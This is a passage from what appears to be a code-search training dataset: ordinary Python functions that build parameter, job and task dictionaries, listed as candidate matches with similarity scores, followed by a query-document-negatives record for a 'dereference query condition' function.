stage_2_num_parallel_trials: Optional[int] = None,\n stage_2_num_selected_trials: Optional[int] = None,\n data_source_csv_filenames: Optional[str] = None,\n data_source_bigquery_table_path: Optional[str] = None,\n predefined_split_key: Optional[str] = None,\n timestamp_split_key: Optional[str] = None,\n stratified_split_key: Optional[str] = None,\n training_fraction: Optional[float] = None,\n validation_fraction: Optional[float] = None,\n test_fraction: Optional[float] = None,\n weight_column: Optional[float] = None,\n study_spec_parameters_override: Optional[List[Dict[str, Any]]] = None,\n optimization_objective_recall_value: Optional[float] = None,\n optimization_objective_precision_value: Optional[float] = None,\n stage_1_tuner_worker_pool_specs_override: Optional[Dict[str, Any]] = None,\n cv_trainer_worker_pool_specs_override: Optional[Dict[str, Any]] = None,\n export_additional_model_without_custom_ops: bool = False,\n stats_and_example_gen_dataflow_machine_type: Optional[str] = None,\n stats_and_example_gen_dataflow_max_num_workers: Optional[int] = None,\n stats_and_example_gen_dataflow_disk_size_gb: Optional[int] = None,\n transform_dataflow_machine_type: Optional[str] = None,\n transform_dataflow_max_num_workers: Optional[int] = None,\n transform_dataflow_disk_size_gb: Optional[int] = None,\n dataflow_subnetwork: Optional[str] = None,\n dataflow_use_public_ips: bool = True,\n encryption_spec_key_name: Optional[str] = None,\n additional_experiments: Optional[Dict[str, Any]] = None,\n dataflow_service_account: Optional[str] = None,\n max_selected_features: Optional[int] = None,\n apply_feature_selection_tuning: bool = False,\n run_evaluation: bool = True,\n evaluation_batch_predict_machine_type: Optional[str] = None,\n evaluation_batch_predict_starting_replica_count: Optional[int] = None,\n evaluation_batch_predict_max_replica_count: Optional[int] = None,\n evaluation_batch_explain_machine_type: Optional[str] = None,\n evaluation_batch_explain_starting_replica_count: Optional[int] = None,\n evaluation_batch_explain_max_replica_count: Optional[int] = None,\n evaluation_dataflow_machine_type: Optional[str] = None,\n evaluation_dataflow_starting_num_workers: Optional[int] = None,\n evaluation_dataflow_max_num_workers: Optional[int] = None,\n evaluation_dataflow_disk_size_gb: Optional[int] = None,\n run_distillation: bool = False,\n distill_batch_predict_machine_type: Optional[str] = None,\n distill_batch_predict_starting_replica_count: Optional[int] = None,\n distill_batch_predict_max_replica_count: Optional[int] = None,\n stage_1_tuning_result_artifact_uri: Optional[str] = None,\n quantiles: Optional[List[float]] = None,\n enable_probabilistic_inference: bool = False,\n num_selected_features: Optional[int] = None,\n model_display_name: str = '',\n model_description: str = '',\n) -> Dict[str, Any]:\n if not study_spec_parameters_override:\n study_spec_parameters_override = []\n if not stage_1_tuner_worker_pool_specs_override:\n stage_1_tuner_worker_pool_specs_override = []\n if not cv_trainer_worker_pool_specs_override:\n cv_trainer_worker_pool_specs_override = []\n if not quantiles:\n quantiles = []\n\n parameter_values = {}\n parameters = {\n 'project': project,\n 'location': location,\n 'root_dir': root_dir,\n 'target_column': target_column,\n 'prediction_type': prediction_type,\n 'data_source_csv_filenames': data_source_csv_filenames,\n 'data_source_bigquery_table_path': data_source_bigquery_table_path,\n 'predefined_split_key': predefined_split_key,\n 'timestamp_split_key': 
timestamp_split_key,\n 'stratified_split_key': stratified_split_key,\n 'training_fraction': training_fraction,\n 'validation_fraction': validation_fraction,\n 'test_fraction': test_fraction,\n 'optimization_objective': optimization_objective,\n 'train_budget_milli_node_hours': train_budget_milli_node_hours,\n 'stage_1_num_parallel_trials': stage_1_num_parallel_trials,\n 'stage_2_num_parallel_trials': stage_2_num_parallel_trials,\n 'stage_2_num_selected_trials': stage_2_num_selected_trials,\n 'weight_column': weight_column,\n 'optimization_objective_recall_value': (\n optimization_objective_recall_value\n ),\n 'optimization_objective_precision_value': (\n optimization_objective_precision_value\n ),\n 'study_spec_parameters_override': study_spec_parameters_override,\n 'stage_1_tuner_worker_pool_specs_override': (\n stage_1_tuner_worker_pool_specs_override\n ),\n 'cv_trainer_worker_pool_specs_override': (\n cv_trainer_worker_pool_specs_override\n ),\n 'export_additional_model_without_custom_ops': (\n export_additional_model_without_custom_ops\n ),\n 'dataflow_subnetwork': dataflow_subnetwork,\n 'dataflow_use_public_ips': dataflow_use_public_ips,\n 'dataflow_service_account': dataflow_service_account,\n 'encryption_spec_key_name': encryption_spec_key_name,\n 'max_selected_features': max_selected_features,\n 'stage_1_tuning_result_artifact_uri': stage_1_tuning_result_artifact_uri,\n 'quantiles': quantiles,\n 'enable_probabilistic_inference': enable_probabilistic_inference,\n 'model_display_name': model_display_name,\n 'model_description': model_description,\n }\n parameter_values.update(\n {param: value for param, value in parameters.items() if value is not None}\n )\n\n if run_evaluation:\n eval_parameters = {\n 'evaluation_batch_predict_machine_type': (\n evaluation_batch_predict_machine_type\n ),\n 'evaluation_batch_predict_starting_replica_count': (\n evaluation_batch_predict_starting_replica_count\n ),\n 'evaluation_batch_predict_max_replica_count': (\n evaluation_batch_predict_max_replica_count\n ),\n 'evaluation_batch_explain_machine_type': (\n evaluation_batch_explain_machine_type\n ),\n 'evaluation_batch_explain_starting_replica_count': (\n evaluation_batch_explain_starting_replica_count\n ),\n 'evaluation_batch_explain_max_replica_count': (\n evaluation_batch_explain_max_replica_count\n ),\n 'evaluation_dataflow_machine_type': evaluation_dataflow_machine_type,\n 'evaluation_dataflow_starting_num_workers': (\n evaluation_dataflow_starting_num_workers\n ),\n 'evaluation_dataflow_max_num_workers': (\n evaluation_dataflow_max_num_workers\n ),\n 'evaluation_dataflow_disk_size_gb': evaluation_dataflow_disk_size_gb,\n 'run_evaluation': run_evaluation,\n }\n parameter_values.update(\n {\n param: value\n for param, value in eval_parameters.items()\n if value is not None\n }\n )\n\n # V1 pipeline without FTE\n if num_selected_features is None:\n if not additional_experiments:\n additional_experiments = {}\n\n parameters = {\n 'transformations': transformations,\n 'stats_and_example_gen_dataflow_machine_type': (\n stats_and_example_gen_dataflow_machine_type\n ),\n 'stats_and_example_gen_dataflow_max_num_workers': (\n stats_and_example_gen_dataflow_max_num_workers\n ),\n 'stats_and_example_gen_dataflow_disk_size_gb': (\n stats_and_example_gen_dataflow_disk_size_gb\n ),\n 'transform_dataflow_machine_type': transform_dataflow_machine_type,\n 'transform_dataflow_max_num_workers': (\n transform_dataflow_max_num_workers\n ),\n 'transform_dataflow_disk_size_gb': transform_dataflow_disk_size_gb,\n 
'additional_experiments': additional_experiments,\n }\n parameter_values.update(\n {\n param: value\n for param, value in parameters.items()\n if value is not None\n }\n )\n\n if apply_feature_selection_tuning:\n parameter_values.update({\n 'apply_feature_selection_tuning': apply_feature_selection_tuning,\n })\n\n if run_distillation:\n distillation_parameters = {\n 'distill_batch_predict_machine_type': (\n distill_batch_predict_machine_type\n ),\n 'distill_batch_predict_starting_replica_count': (\n distill_batch_predict_starting_replica_count\n ),\n 'distill_batch_predict_max_replica_count': (\n distill_batch_predict_max_replica_count\n ),\n 'run_distillation': run_distillation,\n }\n parameter_values.update(\n {\n param: value\n for param, value in distillation_parameters.items()\n if value is not None\n }\n )\n\n # V2 pipeline (with FTE)\n else:\n if run_distillation:\n raise ValueError(\n 'Distillation is currently not supported'\n ' when num_selected_features is specified.'\n )\n\n parameters = {\n 'num_selected_features': num_selected_features,\n 'dataset_level_custom_transformation_definitions': [],\n 'dataset_level_transformations': [],\n 'tf_auto_transform_features': {},\n 'tf_custom_transformation_definitions': [],\n 'legacy_transformations_path': transformations,\n 'feature_transform_engine_dataflow_machine_type': (\n transform_dataflow_machine_type\n ),\n 'feature_transform_engine_dataflow_max_num_workers': (\n transform_dataflow_max_num_workers\n ),\n 'feature_transform_engine_dataflow_disk_size_gb': (\n transform_dataflow_disk_size_gb\n ),\n }\n parameter_values.update(\n {\n param: value\n for param, value in parameters.items()\n if value is not None\n }\n )\n\n return parameter_values", "def get_required_params():\n return {}", "def get_params(self):\n return {\n \"nspecies\": self.nspecies,\n \"lmax\": self.lmax,\n \"nmax\": self.nmax,\n \"rcut\": self.rcut,\n \"sigma\": self.sigma,\n \"trans_width\": self.trans_width\n }", "def _default_params(self) -> Dict[str, Any]:\n normal_params = {\n \"temperature\": self.temperature,\n \"max_tokens\": self.max_tokens,\n \"top_p\": self.top_p,\n \"frequency_penalty\": self.frequency_penalty,\n \"presence_penalty\": self.presence_penalty,\n \"n\": self.n,\n # \"best_of\": self.best_of,\n \"request_timeout\": self.request_timeout,\n \"logit_bias\": self.logit_bias,\n }\n return {**normal_params, **self.model_kwargs}", "def task_parameters(self):\n yield self.properties", "def get_params(self):\n return {}", "def parameters(self) -> Optional[Mapping[str, str]]:\n return pulumi.get(self, \"parameters\")", "def parameters(self) -> Optional[Mapping[str, str]]:\n return pulumi.get(self, \"parameters\")", "def parameters(self) -> Optional[Mapping[str, str]]:\n return pulumi.get(self, \"parameters\")", "def parameters(self) -> Optional[Mapping[str, str]]:\n return pulumi.get(self, \"parameters\")", "def parameters(self) -> Optional[Mapping[str, str]]:\n return pulumi.get(self, \"parameters\")", "def parameters(self) -> Optional[Mapping[str, str]]:\n return pulumi.get(self, \"parameters\")", "def parameters(self) -> Optional[Mapping[str, str]]:\n return pulumi.get(self, \"parameters\")", "def parameters(self) -> Optional[Mapping[str, str]]:\n return pulumi.get(self, \"parameters\")", "def parameters(self) -> Optional[Mapping[str, str]]:\n return pulumi.get(self, \"parameters\")", "def parameters(self) -> Optional[Mapping[str, str]]:\n return pulumi.get(self, \"parameters\")", "def parameters(self) -> Optional[Mapping[str, str]]:\n return 
pulumi.get(self, \"parameters\")", "def parameters(self) -> Optional[Mapping[str, str]]:\n return pulumi.get(self, \"parameters\")", "def get_params(self):\n return {'k': self.k, 'q': self.q, 'sigma_s': self.sigma_s, 'm': self.m}", "def getJobDict(self):\n c = \"/cli:python /app:matrix /cmd:getinfo /dev:joblist\"\n self.sendCMDstring(c)\n time.sleep(self.delay)\n answers = self.readandparseCAM()\n joblist = {}\n for a in answers:\n if a['dev']=='joblist':\n for i in range(int(a['count'])):\n nr = a['jobid' +str(i+1)]\n name = a['jobname' +str(i+1)].lower()\n joblist[name]=nr\n else:\n print \"no joblist in answers\"\n return joblist", "def parse_settings(self, requested_kwargs):\n kwargs = {}\n task_list = []\n for qb in self.qubits:\n task = {}\n task_list_fields = requested_kwargs['task_list_fields']\n\n value_params = {'v_low': None, 'v_high': None, 'pts': None}\n\n for name, value in value_params.items():\n value = self.get_param_value(name, qubit=qb.name)\n value_params[name] = value\n\n sweep_points_v = task_list_fields.get('sweep_points', None)\n if sweep_points_v is not None:\n # Get first dimension (there is only one)\n # TODO: support for more dimensions?\n sweep_points_kws = next(iter(\n self.kw_for_sweep_points.items()))[1]\n values = np.linspace(value_params['v_low'],\n value_params['v_high'],\n value_params['pts'])\n task['sweep_points'] = SweepPoints()\n # FIXME: why is values_func an invalid paramteter, if it is in\n # kw_for_sweep_points?\n sweep_points_kws.pop('values_func', None)\n task['sweep_points'].add_sweep_parameter(values=values,\n **sweep_points_kws)\n\n qb_v = task_list_fields.get('qb', None)\n if qb_v is not None:\n task['qb'] = qb.name\n\n for k, v in task_list_fields.items():\n if k not in task:\n task[k] = self.get_param_value(k,\n qubit=qb.name,\n default=v[1])\n\n task_list.append(task)\n\n kwargs['task_list'] = task_list\n\n kwargs_super = super().parse_settings(requested_kwargs)\n kwargs_super.update(kwargs)\n\n return kwargs_super", "def get_job_details():\n job = dict()\n job['dids'] = json.loads(os.getenv('DIDS', None))\n job['metadata'] = dict()\n job['files'] = dict()\n job['algo'] = dict()\n job['secret'] = os.getenv('secret', None)\n algo_did = os.getenv('TRANSFORMATION_DID', None)\n if job['dids'] is not None:\n for did in job['dids']:\n # get the ddo from disk\n filename = '/data/ddos/' + did\n print(f'Reading json from {filename}')\n with open(filename) as json_file:\n ddo = json.load(json_file)\n # search for metadata service\n for service in ddo['service']:\n if service['type'] == 'metadata':\n job['files'][did] = list()\n index = 0\n for file in service['attributes']['main']['files']:\n job['files'][did].append(\n '/data/inputs/' + did + '/' + str(index))\n index = index + 1\n if algo_did is not None:\n job['algo']['did'] = algo_did\n job['algo']['ddo_path'] = '/data/ddos/' + algo_did\n return job", "def get_job_details():\n job = dict()\n job['dids'] = json.loads(os.getenv('DIDS', None))\n job['metadata'] = dict()\n job['files'] = dict()\n job['algo'] = dict()\n job['secret'] = os.getenv('secret', None)\n algo_did = os.getenv('TRANSFORMATION_DID', None)\n if job['dids'] is not None:\n for did in job['dids']:\n # get the ddo from disk\n filename = '/data/ddos/' + did\n print(f'Reading json from {filename}')\n with open(filename) as json_file:\n ddo = json.load(json_file)\n # search for metadata service\n for service in ddo['service']:\n if service['type'] == 'metadata':\n job['files'][did] = list()\n index = 0\n for file in 
service['attributes']['main']['files']:\n job['files'][did].append(\n '/data/inputs/' + did + '/' + str(index))\n index = index + 1\n if algo_did is not None:\n job['algo']['did'] = algo_did\n job['algo']['ddo_path'] = '/data/ddos/' + algo_did\n return job", "def _task_info_format(task_info_ref):\n if task_info_ref is None:\n return {}\n return {\n 'task_id': task_info_ref['task_id'],\n 'input': task_info_ref['input'],\n 'result': task_info_ref['result'],\n 'message': task_info_ref['message'],\n }", "def get_schedule_meeting_params(params):\n duration = None\n if \"duration\" in params and params[\"duration\"]:\n duration = params[\"duration\"][\"amount\"]\n if params[\"duration\"][\"unit\"] == \"h\":\n duration *= 60\n\n result = {\"datetime\": get_datetime(params), \"duration\": duration}\n\n return result", "def get_metadata(self, db_running_task: SchedulerTask, task_logger: Logger):\n cmd = [f\"qstat -f -F json -x {db_running_task.job_id}\"]\n\n out, err = self._run_command_and_wait(cmd, shell=True)\n # remove values that contains backslash\n # several GPU-related variables contains only a single backslash and nothing else, which will cause loads() to crash\n out = out.replace(\"\\\\\", \"\")\n json_dict = json.loads(out, strict=False)\n\n if \"Jobs\" not in json_dict:\n # a special case when a job is cancelled before getting logged in the scheduler\n task_logger.warning(\n \"job data cannot be retrieved from qstat.\"\n \" likely the job is cancelled before recording.\"\n \" setting job status to CANCELLED\"\n )\n submit_time, start_time, end_time = [0] * 3\n n_cores = 0.0\n run_time = 0\n status = \"CANCELLED\"\n return start_time, end_time, run_time, n_cores, status\n\n tasks_dict = json_dict[\"Jobs\"]\n assert (\n len(tasks_dict.keys()) == 1\n ), f\"Too many tasks returned by qstat: {tasks_dict.keys()}\"\n\n task_name = list(tasks_dict.keys())[0]\n task_dict = tasks_dict[task_name]\n submit_time = task_dict[\"ctime\"].replace(\" \", \"_\")\n start_time = task_dict[\"qtime\"].replace(\" \", \"_\")\n # Last modified time. There isn't an explicit end time,\n # so only other option would be to add walltime to start time\n end_time = task_dict[\"mtime\"].replace(\" \", \"_\")\n # check if 'resources_used' are one of the fields\n if \"resources_used\" in task_dict.keys():\n n_cores = float(task_dict[\"resources_used\"][\"ncpus\"])\n run_time = task_dict[\"resources_used\"][\"walltime\"]\n else:\n # give a dummy data when pbs failed to return json with required field\n n_cores = 1\n run_time = \"00:00:01\"\n\n # status uses the same states as the queue monitor, rather than full words like sacct\n status = task_dict[\"job_state\"]\n\n return start_time, end_time, run_time, n_cores, status", "def get_params(self) -> Dict:\n params: Dict = {}\n params['g_leak'] = self.leak.get_g()\n params['g_kvhh'] = self.kvhh.get_g()\n params['g_cav'] = self.cav.get_g()\n params['g_kca'] = self.kca.get_g()\n params['g_nap'] = self.nap.get_g()\n params['t_ca'] = self.tau_ca\n return params", "def _get_job_dict(self, job):\n\t\t\n\t\tjobs = {}\t\t\n\t\tfor job in self.job_list.items(job):\n\t\t\tjobs[job[0]] = job[1]\n\t\t\t\n\t\treturn jobs", "def sched_parameter(self,i,task):\n dest= task.jobs[i-1]['dlsDestination']\n\n req=''\n #req +=task['jobType']\n ####### FEDE FOR BUG 73010 ############\n try: \n #print \"task['jobType'] = \", task['jobType']\n req +=task['jobType']\n except TypeError:\n msg = \"Error: wrong or missing task info. Your created task can not be submitted. 
Please check your configuration file and create the task again. \\n \"\n raise CrabException(msg) \n ####################################### \n\n sched_param=''\n sched_param+='Requirements = ' + req +self.specific_req() + self.se_list(dest) +\\\n self.ce_list()[0] +';\\n'\n if self.EDG_addJdlParam: sched_param+=self.jdlParam()\n sched_param+='MyProxyServer = \"' + self.proxyServer + '\";\\n'\n sched_param+='VirtualOrganisation = \"' + self.VO + '\";\\n'\n sched_param+='RetryCount = '+str(self.EDG_retry_count)+';\\n'\n sched_param+='DefaultNodeRetryCount = '+str(self.EDG_retry_count)+';\\n'\n sched_param+='ShallowRetryCount = '+str(self.EDG_shallow_retry_count)+';\\n'\n sched_param+='DefaultNodeShallowRetryCount = '+str(self.EDG_shallow_retry_count)+';\\n'\n\n return sched_param", "def __read_job_params_file__(self):\n # | - __read_job_params_file__\n job_params = {}\n\n # file_path = self.full_path + \"/\" + \"job_parameters.json\"\n\n file_exists = False\n\n file_path = os.path.join(\n self.full_path,\n \"job_parameters.json\")\n if os.path.exists(file_path):\n file_exists = True\n with open(file_path, \"r\") as fle:\n job_params = json.load(fle)\n\n\n ind_i = self.full_path.rfind(self.full_path.split(\"/\")[-1])\n path_i_rt = self.full_path[:ind_i - 1]\n\n file_path = os.path.join(\n # self.full_path[0:-2],\n path_i_rt,\n \"job_parameters.json\",\n )\n if os.path.exists(file_path):\n file_exists = True\n with open(file_path, \"r\") as fle:\n job_params = json.load(fle)\n\n\n file_path = os.path.join(\n # self.full_path[0:-2],\n path_i_rt,\n \"job_params.json\",\n )\n if os.path.exists(file_path):\n file_exists = True\n with open(file_path, \"r\") as fle:\n job_params = json.load(fle)\n\n if not file_exists:\n print(\"No job_params file found for following job:\")\n print(self.full_path)\n\n return(job_params)\n # __|", "def parameters(self):\n return {\"W\": self.W,\n \"T\": self.T,\n \"P\": self.P,\n \"Wo\": self.Wo,\n \"To\": self.To,\n \"Po\": self.Po}", "def get_params(self):\n\n return None", "def get_params(self):\n\n return None", "def get_params(self):\n\n return None", "def get_params():\n\n parser = get_params_parser()\n args = parser.parse_args()\n\n tasks = [args.raw, args.enrich, args.identities_load, args.identities_merge, args.panels]\n\n if not any(tasks):\n print(\"No tasks enabled\")\n sys.exit(1)\n\n return args", "def parameters(self) -> Optional[pulumi.Input['MemcacheParametersArgs']]:\n return pulumi.get(self, \"parameters\")", "def get_params(self):\n return {'classifier': self.classifier,\n 'grid_param': self.grid_param,\n 'n_param_comb': self.n_param_comb,\n 'top_bagging': self.bagging,\n 'bagging_param': self.bagging_param,\n 'comb_seed': self.comb_seed}", "def _kwargs(self):\n dict = DAG._kwargs(self) \n dict[\"inputpaths\"] = self.inputpaths\n dict[\"outputpath\"] = self.outputpath\n dict[\"query\"] = self.query\n return dict", "def get_params(self) -> Dict:\n params: Dict = {}\n channel: str\n for channel in list(self.channel.keys()):\n if self.channel_bool[channel]:\n params[channel] = self.channel[channel].get_g()\n if self.tau_ca != float('inf'):\n params['t_ca'] = self.tau_ca\n return params", "def _load_dict(self, kwargs):\n # TaskInfo always needs a description and task_type, but all other\n # supported (optional) parameters are loaded from kwargs to\n keyword_args = dict(kwargs)\n task_id = TaskInfo._dpop(keyword_args, \"id\")\n if task_id is not None:\n self.id = task_id\n\n priority = TaskInfo._dpop(keyword_args, \"priority\")\n if priority is 
None:\n priority = TaskPriority.MEDIUM\n else:\n priority = int(priority)\n\n description = TaskInfo._dpop(keyword_args, \"description\")\n if description is not None:\n self.description = description\n\n task_type = TaskInfo._dpop(keyword_args, \"type\")\n if task_type is not None:\n self.type = task_type\n\n # store unknown args so that they are not lost across\n # serialization/deserialization\n self._unknown_args = keyword_args\n\n self.set_priority(priority)", "def _prerun(self, sess, task_a_data, task_b_data):\r\n fdict = self.get_fdict(task_a_data=task_a_data, task_b_data=task_b_data)\r\n return fdict", "def parameters(self) -> Mapping[str, str]:\n return pulumi.get(self, \"parameters\")", "def realSchedParams(self,cfg_params):\n self.rb_param_file=''\n if (not cfg_params.has_key('GRID.rb')):\n cfg_params['GRID.rb']='CERN'\n self.rb_param_file=common.scheduler.rb_configure(cfg_params.get(\"GRID.rb\"))\n self.wms_service=cfg_params.get(\"GRID.wms_service\",'')\n self.skipWMSAuth=cfg_params.get(\"GRID.skipwmsauth\",1)\n params = { 'service' : self.wms_service, \\\n 'config' : self.rb_param_file, \\\n 'skipWMSAuth' : self.skipWMSAuth\n }\n return params", "def parameters(self) -> Dict[str, Any]:\n return self.trainer_parameters", "def args_map_custom(cls) -> dict:\n args = {}\n args.update(cls.args_map_export())\n args.update({\"json_flat\": False})\n return args", "def get_job_parameters(self, jobName):\n if not self.get_server_instance():\n print(colored('Server instance not received', 'red'))\n return False\n\n if not self.server.has_job(jobName):\n print(colored('Job [' + jobName + '] not found', 'red'))\n return False\n\n return self.server[jobName].get_params_list()", "def _identifying_params(self) -> Mapping[str, Any]:\n return {**{\"model_name\": self.model_name}, **self._default_params}", "def _get_base_dict(self):\n res = dict(\n task=self._task,\n timestamp=self._timestamp,\n metric=self._metric,\n variant=self._variant\n )\n if self._iter is not None:\n res.update(iter=self._iter)\n if self._model_event is not None:\n res.update(model_event=self._model_event)\n return res", "def get_params():\n return {\"tweet.fields\": \"id,text,author_id,conversation_id,\"\n \"created_at,geo,in_reply_to_user_id,lang,\"\n \"public_metrics,source\"}", "def get_recipe_params(self):\n return self.recipe_settings.get('params')", "def set_task(self, task: dict):\n self.graph = task['graph']\n self.game_length = task['game_length']\n\n # Setup task parameters.\n self.num_subtasks = len(self.graph.subtask_id_list)\n self.subtask_reward = self.graph.subtask_reward\n self.subtask_id_list = self.graph.subtask_id_list # task-specific subtask ids\n\n # Setup map parameters.\n self.map.set_map(\n subtask_id_list=self.subtask_id_list,\n map_parameters=task['map_parameters']\n )", "def _get_vars(self, variables, required=None):\n return_dict = {}\n for variable in variables:\n return_dict[variable] = self.module.params.get(variable)\n else:\n if isinstance(required, list):\n for var_name in required:\n check = return_dict.get(var_name)\n if check is None:\n self.failure(\n error='Missing [ %s ] from Task or found a None'\n ' value' % var_name,\n rc=000,\n msg='variables %s - available params [ %s ]'\n % (variables, self.module.params)\n )\n return return_dict", "def getParametersFromTraj(self, traj):\n # DO NOT use short names for star notation dicts\n runParams = self.traj.parameters.f_to_dict(short_names=not self.parameterSpace.star, fast_access=True)\n runParams = 
self._validatePypetParameters(runParams)\n return dotdict(runParams)", "def parameters(self) -> Dict[str, Any]:\n return self.data[\"args\"].get(\"parameters\", {})", "def _params(self, request: Request) -> dict:\n params = {'forceAsync': True}\n\n subset = self._spatial_subset_params(request) + self._temporal_subset_params(request)\n if len(subset) > 0:\n params['subset'] = subset\n\n for p, val in request.parameter_values():\n if type(val) == str:\n params[p] = val\n elif type(val) == bool:\n params[p] = str(val).lower()\n elif type(val) == list and type(val[0]) != str:\n params[p] = ','.join([str(v) for v in val])\n else:\n params[p] = val\n\n return params", "def params():\n return utils.Params('../experiments/base-model/params.json')", "def get_job_id(self):\n return {'job_id': self._job_id}", "def step_extract_parameters(self) -> list:\n result = []\n if self.has_step_field(\"task.parameters\"):\n for param in self.step_field(\"task.parameters\"):\n for key in param:\n result += [\"-p\", key, param[key]]\n return result", "def get_report_parameters(self, args, default_mask=0):\n # Get the task|project filter keyword and an alias\n pname = tname = ''\n mask = 0\n if args[0] in ('task', 'project'):\n if not len(args) >= 2:\n print(\"*** Error: Wrong format of the object parameter '%s'\"\n \"\" % args[0])\n return\n tname, pname = self.validate_object(\n keyword=args[0], thing=args[1].decode('utf-8'))\n args = args[2:]\n # Get 'extend' parameter\n if args and args[0] == 'extend':\n if len(args) == 1:\n print(\"*** Error: Wrong extend bitmask.\")\n return\n # Get mask if 'extend' parameter presents\n mask = helpers.parse_extend_mask(args[1])\n args = args[2:]\n mask = default_mask if not mask else mask\n # Get dates\n started, finished = helpers.parse_date_parameters(args)\n return tname, pname, started, finished, mask" ]
[ "0.63929814", "0.6278747", "0.6234184", "0.60798496", "0.601743", "0.59797996", "0.5893281", "0.5834644", "0.5736956", "0.5709796", "0.5683366", "0.5677564", "0.559777", "0.5590839", "0.5587835", "0.556893", "0.55425924", "0.5519106", "0.55032396", "0.54824823", "0.54682976", "0.5464532", "0.5445745", "0.5430504", "0.5429934", "0.5421744", "0.54204655", "0.54198897", "0.5409462", "0.54025435", "0.53928345", "0.5391649", "0.5383156", "0.5377929", "0.53707457", "0.53690684", "0.5360895", "0.5357442", "0.53490996", "0.53475285", "0.5346833", "0.53248", "0.53152883", "0.53138", "0.5298522", "0.5295875", "0.52869135", "0.5277496", "0.5277496", "0.5277496", "0.5277496", "0.5277496", "0.5277496", "0.5277496", "0.5277496", "0.5277496", "0.5277496", "0.5277496", "0.5277496", "0.52694535", "0.52557623", "0.52438664", "0.5239574", "0.5239574", "0.52390844", "0.52231216", "0.52148074", "0.52025646", "0.5176427", "0.51708555", "0.5161712", "0.51596427", "0.5159003", "0.5159003", "0.5159003", "0.51589614", "0.5153648", "0.5153354", "0.5141807", "0.5135917", "0.5125532", "0.5122491", "0.5119271", "0.51112485", "0.5105496", "0.5096203", "0.50892127", "0.50883216", "0.50791496", "0.5079128", "0.5075979", "0.5073189", "0.50688726", "0.50595427", "0.50560147", "0.5052059", "0.5047639", "0.50393105", "0.50345093", "0.50249004" ]
0.8269762
0
Get dereference query condition. Called by dereference()
def get_defererence_query(self): return {"id": self.key}
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def condition(self) -> global___Expression:", "def condition(self) -> global___Expression:", "def get_predicate(self):\n return self._predicate", "def query (node, grounding, db):\n return db.funcVal(grounding.groundNode(node))", "def condition(self) -> ExpressionNode:\n return self.__condition", "def where(self, condition):\n raise NotImplementedError(\"This should have been implemented.\")", "def query_predicate(self, p):\n self.setQuery(\"\"\"\n Select ?s ?o where {\n ?s %s ?o\n } ORDER BY (?s)\"\"\" % (p))\n\n try:\n rval = self.query()\n g = rval.convert()\n return [(x['s']['value'], x['o']['value']) for x in g['results']['bindings']]\n except:\n print \"Select failed\"\n traceback.print_exc(file=sys.stdout)", "def cond_predicate(clause):\n return car(clause)", "def predicate (self) :\n\n return self.__predicate__", "def _query(self, p, k):\n if isinstance(p, int):\n if k >= len(self._table[p]):\n return None\n return self._table[p][k]\n\n # if k > self._tree.depth(p):\n if k >= len(self._table[p.index()]):\n return None\n return self._table[p.index()][k]", "def get_query():\n return CiscoVlanIftableRelationshipQuery", "def query(self):\n return self.details[KEY_QUERY]", "def _link_for_query(self, query):\r\n results = list(query)\r\n return results[0] if results else None", "def get_basic_query_cond(column: str, val: str, query_params: dict):\n if val is not None:\n query_params[column] = val\n return 'AHJ.' + column + '=%(' + column + ')s AND '\n return ''", "def condition(self) -> str | None:\n return self._condition", "def test_predicate8(self):\n xpb = XPathBuilder()\n pred = (xpb.attr('name').equals('foo')\n .log_and(xpb.attr('x').equals('x')))\n xp = xpb.foo.bar.where(pred)\n exp = '/foo/bar[@name = \"foo\" and @x = \"x\"]'\n self.assertEqual(xp.tostring(), exp)", "def predicate (self, qx) :\n hg = self.head_getter\n tg = self.tail_getter\n tn = self.type_name\n result = qx (hg) [tn]\n if tg is not None :\n result = tg (result)\n return result", "def query(self):\n return self._query", "def query(self):\n return self._query", "def query(self):\n return self._query", "def query(self):\n \n return self._query", "def get_condition(self,ns=None):\n if ns is None:\n ns=self.ns\n c=self.xpath_eval(\"ns:*\")\n if not c:\n self.upgrade()\n c=self.xpath_eval(\"ns:*\")\n if not c:\n return None\n if ns==self.ns and c[0].name==\"text\":\n if len(c)==1:\n return None\n c=c[1:]\n return c[0]", "def query(self):\n return self.__query", "def _query(self, p, k):\n if k > self._tree.depth(p):\n return None\n\n if k == 0:\n return p\n\n # Find the jump-node descendant of the node and recompute the query level.\n jump = self._jump[p.index()]\n k = k + self._tree.depth(jump) - self._tree.depth(p)\n\n l = self._log[k] # k = 2^l + d\n d = k - self._pow[l]\n\n u = self._table[jump.index()][l]\n w = self._ladders[self._path[u.index()]][self._ind[u.index()] - d]\n\n return w", "def _extract_where(self, query) :\n\t\tquery = copy.copy(query)\n\t\t\n\t\t# discard the insert information\n\t\tif self.n.sparql.insert in query :\n\t\t\tdel query[self.n.sparql.insert]\n\t\t\n\t\t# discard the delete information\n\t\tif self.n.sparql.delete in query :\n\t\t\tdel query[self.n.sparql.delete]\n\t\t\n\t\t# build the where clause with outlined variables\n\t\treturn self.python_to_SPARQL_long(query)", "def check_deref_attr_func(self, node):\n options = node.options\n ast = node.ast\n declarator = ast.declarator\n attrs = declarator.attrs\n deref = attrs[\"deref\"]\n mderef = None\n ntypemap = ast.typemap\n 
nindirect = declarator.is_indirect()\n if declarator.get_subprogram() == \"subroutine\":\n pass\n if ntypemap.sgroup == \"void\":\n # Unable to set Fortran pointer for void\n # if deref set, error\n pass\n elif ntypemap.sgroup == \"shadow\":\n # Change a C++ pointer into a Fortran pointer\n # return 'void *' as 'type(C_PTR)'\n # 'shadow' assigns pointer to type(C_PTR) in a derived type\n # Array of shadow?\n pass\n elif ntypemap.sgroup == \"string\":\n if deref:\n mderef = deref\n elif attrs[\"len\"]:\n mderef = \"copy\"\n else:\n mderef = \"allocatable\"\n elif ntypemap.sgroup == \"vector\":\n if deref:\n mderef = deref\n else:\n mderef = \"allocatable\"\n elif nindirect > 1:\n if deref:\n raise RuntimeError(\n \"Cannot have attribute 'deref' on function which returns multiple indirections in {}\".\n format(node.decl))\n elif nindirect == 1:\n # pointer to a POD e.g. int *\n if deref:\n mderef = deref\n elif ntypemap.sgroup == \"char\": # char *\n if attrs[\"len\"]:\n mderef = \"copy\"\n else:\n mderef = \"allocatable\"\n elif attrs[\"dimension\"]:\n mderef = \"pointer\"\n else:\n mderef = options.return_scalar_pointer\n elif deref:\n raise RuntimeError(\n \"Cannot have attribute 'deref' on non-pointer in {}\".format(\n node.decl\n )\n )\n ast.declarator.metaattrs[\"deref\"] = mderef", "def test_name_ref_with_path(renderer, engine):\n class Model(bloop.new_base()):\n id = bloop.Column(bloop.Integer, 